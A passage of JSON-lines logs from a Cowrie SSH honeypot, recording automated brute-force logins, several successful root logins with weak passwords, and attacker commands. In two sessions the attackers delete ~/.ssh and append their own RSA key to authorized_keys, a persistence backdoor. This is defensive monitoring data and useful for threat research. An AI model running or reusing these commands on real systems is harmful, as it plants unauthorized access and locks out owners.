"hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:42:10.913753Z","src_ip":"212.227.235.229","session":"02d82464bf43"}
{"eventid":"cowrie.login.success","username":"root","password":"pagedown","message":"login attempt [root/pagedown] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:42:12.519835Z","src_ip":"212.227.235.229","session":"02d82464bf43"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:42:13.158556Z","src_ip":"212.227.235.229","session":"02d82464bf43"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T03:42:13.159338Z","src_ip":"212.227.235.229","session":"02d82464bf43"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T03:42:13.160184Z","src_ip":"212.227.235.229","session":"02d82464bf43"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:42:13.470840Z","src_ip":"212.227.235.229","session":"02d82464bf43"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60504,"dst_ip":"1.2.3.4","dst_port":22,"session":"8f50a4e976e5","protocol":"ssh","message":"New connection: 212.227.125.160:60504 (1.2.3.4:22) [session: 8f50a4e976e5]","sensor":"my-vps","timestamp":"2025-08-31T03:42:14.058985Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:42:14.408738Z","src_ip":"212.227.235.229","session":"02d82464bf43"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T03:42:14.409480Z","src_ip":"212.227.235.229","session":"02d82464bf43"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:42:14.594887Z","src_ip":"212.227.125.160","session":"8f50a4e976e5"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:42:14.595659Z","src_ip":"212.227.125.160","session":"8f50a4e976e5"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T03:42:14.719722Z","src_ip":"212.227.235.229","session":"02d82464bf43"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:42:14.720652Z","src_ip":"212.227.235.229","session":"02d82464bf43"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:42:14.814044Z","src_ip":"212.227.235.229","session":"15cbaeaf80b9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:42:14.814913Z","src_ip":"212.227.235.229","session":"15cbaeaf80b9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46654,"dst_ip":"1.2.3.4","dst_port":22,"session":"60443fbed0e1","protocol":"ssh","message":"New connection: 212.227.235.229:46654 (1.2.3.4:22) [session: 60443fbed0e1]","sensor":"my-vps","timestamp":"2025-08-31T03:42:15.055962Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:42:15.057999Z","src_ip":"212.227.235.229","session":"60443fbed0e1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:42:15.389222Z","src_ip":"212.227.235.229","session":"60443fbed0e1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40189,"dst_ip":"1.2.3.4","dst_port":22,"session":"8b427e3bde12","protocol":"ssh","message":"New connection: 212.227.235.229:40189 (1.2.3.4:22) [session: 8b427e3bde12]","sensor":"my-vps","timestamp":"2025-08-31T03:42:16.418426Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:42:16.419076Z","src_ip":"212.227.235.229","session":"8b427e3bde12"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"admin123","message":"login attempt [hadoop/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:42:16.544034Z","src_ip":"212.227.125.160","session":"8f50a4e976e5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:42:16.679742Z","src_ip":"212.227.235.229","session":"8b427e3bde12"}
{"eventid":"cowrie.login.success","username":"root","password":"1234","message":"login attempt [root/1234] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:42:16.855762Z","src_ip":"212.227.125.160","session":"74acaa90bfd8"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T03:42:17.077048Z","src_ip":"212.227.235.229","session":"60443fbed0e1"}
{"eventid":"cowrie.login.failed","username":"webadmin","password":"Welcome@123","message":"login attempt [webadmin/Welcome@123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:42:17.732654Z","src_ip":"212.227.235.229","session":"8b427e3bde12"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:42:18.044383Z","src_ip":"212.227.125.160","session":"8f50a4e976e5"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:42:18.759140Z","src_ip":"212.227.235.229","session":"60443fbed0e1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39662,"dst_ip":"1.2.3.4","dst_port":22,"session":"72cb56bc27e0","protocol":"ssh","message":"New connection: 212.227.235.229:39662 (1.2.3.4:22) [session: 72cb56bc27e0]","sensor":"my-vps","timestamp":"2025-08-31T03:42:19.095377Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:42:19.096259Z","src_ip":"212.227.235.229","session":"72cb56bc27e0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:42:19.421637Z","src_ip":"212.227.235.229","session":"72cb56bc27e0"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:42:20.907626Z","src_ip":"212.227.235.229","session":"72cb56bc27e0"}
{"eventid":"cowrie.session.closed","duration":"10.6","message":"Connection lost after 10.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:42:21.225905Z","src_ip":"212.227.235.229","session":"02d82464bf43"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:42:21.235032Z","src_ip":"212.227.235.229","session":"72cb56bc27e0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56322,"dst_ip":"1.2.3.4","dst_port":22,"session":"482411b28ffe","protocol":"ssh","message":"New connection: 212.227.125.160:56322 (1.2.3.4:22) [session: 482411b28ffe]","sensor":"my-vps","timestamp":"2025-08-31T03:42:24.933455Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36290,"dst_ip":"1.2.3.4","dst_port":22,"session":"f845acc2e264","protocol":"ssh","message":"New connection: 212.227.125.160:36290 (1.2.3.4:22) [session: f845acc2e264]","sensor":"my-vps","timestamp":"2025-08-31T03:42:47.621999Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:42:47.622836Z","src_ip":"212.227.125.160","session":"f845acc2e264"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:42:47.869761Z","src_ip":"212.227.125.160","session":"f845acc2e264"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":58894,"dst_ip":"1.2.3.4","dst_port":22,"session":"8566de78893f","protocol":"ssh","message":"New connection: 217.72.205.35:58894 (1.2.3.4:22) [session: 8566de78893f]","sensor":"my-vps","timestamp":"2025-08-31T03:42:48.497377Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:42:48.498442Z","src_ip":"217.72.205.35","session":"8566de78893f"}
{"eventid":"cowrie.login.success","username":"root","password":"123","message":"login attempt [root/123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:42:48.891304Z","src_ip":"212.227.125.160","session":"f845acc2e264"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:42:49.408435Z","src_ip":"212.227.125.160","session":"f845acc2e264"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T03:42:49.409191Z","src_ip":"212.227.125.160","session":"f845acc2e264"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T03:42:49.410346Z","src_ip":"212.227.125.160","session":"f845acc2e264"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:42:49.656657Z","src_ip":"212.227.125.160","session":"f845acc2e264"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:42:50.614531Z","src_ip":"212.227.125.160","session":"f845acc2e264"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T03:42:50.615280Z","src_ip":"212.227.125.160","session":"f845acc2e264"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T03:42:50.863682Z","src_ip":"212.227.125.160","session":"f845acc2e264"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:42:50.864534Z","src_ip":"212.227.125.160","session":"f845acc2e264"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37398,"dst_ip":"1.2.3.4","dst_port":22,"session":"df7e66eb6d63","protocol":"ssh","message":"New connection: 212.227.125.160:37398 (1.2.3.4:22) [session: df7e66eb6d63]","sensor":"my-vps","timestamp":"2025-08-31T03:42:51.106647Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:42:51.107457Z","src_ip":"212.227.125.160","session":"df7e66eb6d63"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:42:51.348978Z","src_ip":"212.227.125.160","session":"df7e66eb6d63"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50084,"dst_ip":"1.2.3.4","dst_port":22,"session":"139feb80ccdd","protocol":"ssh","message":"New connection: 212.227.235.229:50084 (1.2.3.4:22) [session: 139feb80ccdd]","sensor":"my-vps","timestamp":"2025-08-31T03:42:52.147797Z"}
